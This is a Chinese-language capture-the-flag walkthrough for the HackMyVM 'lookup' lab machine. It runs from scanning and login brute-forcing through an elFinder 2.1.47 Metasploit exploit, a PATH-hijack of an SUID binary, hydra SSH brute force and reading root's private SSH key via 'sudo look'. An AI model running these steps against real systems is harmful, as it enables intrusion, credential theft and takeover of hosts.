hackmyvm-lookup

arp-scan -l

nmap -sS -v 192.168.222.209

gobuster dir -u http://192.168.222.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

发现了一处dns解析，在/etc/hosts中添加

192.168.222.209 lookup.hmv

发现可以访问，是一处登录框

gobuster dir -u http://lookup.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

漏洞发现

whatweb http://lookup.hmv

抓包，爆破

得到:username=jose&password=password123

跳转到http://files.lookup.hmv/，在hosts中添加这个域名

是一个elfinder 管理器

得到版本信息v2.1.47

msfconsole

set RHOSTS files.lookup.hmv

运行，进入shell环境（shell -t）

搜索具备SUID权限的程序

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -user root -perm -4000 -print 2>/dev/null

我们需要关注/usr/sbin/pwm，它正试图执行id命令来提取用户名和用户id。出现问题是因为它找不到.passwords文件，因为它位于“think”用户的主目录中，并且路径不同。

/usr/bin/script -qc /bin/bash /dev/null：启动一个新的 Bash shell

#!/bin/bash

echo "uid=33(think) gid=33(think) groups=33(think)"

开启http服务将id文件传进去

伪造id

PATH=/tmp:$PATH

chmod +x id

运行/usr/sbin/pwm

可以看到我们已经拿到/home/think/.password的内容

将跑出来的内容保存到本地pass.txt

hydra -l think -P pass.txt ssh://192.168.222.209 -V -I

ssh think@192.168.222.209

登录成功

sudo -l

sudo look '' /root/.ssh/id_rsa

将私钥完整粘贴到本地文件id中

使用 ​chmod​ 命令将私钥文件的权限设置为 ​600：

chmod 600 id

验证权限是否已更改：

ls -l id

连接root用户的ssh

ssh root@192.168.222.209 -i id